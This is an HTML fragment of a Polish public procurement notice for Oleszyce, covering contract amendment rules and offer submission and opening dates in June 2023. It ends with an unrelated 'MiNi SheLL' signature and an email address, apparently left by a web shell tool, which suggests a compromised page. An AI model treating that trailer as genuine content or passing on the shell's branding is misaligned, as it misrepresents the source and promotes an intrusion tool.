class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa zostanie zawarta w wyznaczonym przez Zamawiającego terminie i miejscu.<br/>2. Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na zasadach określonych we wzorze umowy, będącym<br/>załącznikiem do specyfikacji warunków zamówienia (załącznik nr 7 do swz). Zapisy wzoru umowy dołączonego do swz<br/>zostaną dostosowane do treści złożonej przez Wykonawcę oferty.<br/>3. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, chyba że wystąpią okoliczności określone w art. 455 ustawy Pzp, a także okoliczności, które przemawiają za<br/>koniecznością zmiany postanowień umowy określone we wzorze umowy wg załącznika nr 7 do swz.<br/>4. Warunkiem wprowadzenia zmian w umowie jest pisemny wniosek o zmianę umowy (zawarcie aneksu) złożony przez<br/>Wykonawcę.<br/>5. Wykonawca zobowiązany jest wykazać zaistnienie okoliczności wskazanych we wzorze umowy poprzez przedłożenie<br/>stosownych ekspertyz, opinii, dokumentów, itp. z których będzie wynikać konieczność zmiany umowy.<br/>6. Wszelkie zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej w postaci aneksu pod rygorem<br/>nieważności.<br/>7. Podpisanie aneksu do umowy wprowadzającego zmiany spowodowane zaistnieniem okoliczności wskazanych we wzorze<br/>umowy powinno być poprzedzone, pod rygorem nieważności, sporządzeniem protokołu konieczności zawierającego<br/>uzasadnienie.<br/>8. Konsekwencją zmiany umowy (aneksowania) może być w szczególności zmiana terminu zakończenia realizacji zadania,<br/>wydłużenie terminów obowiązywania zabezpieczenia należytego wykonania umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-05 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https;//platformazakupowa.pl/pn/oleszyce</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-05 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-04</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com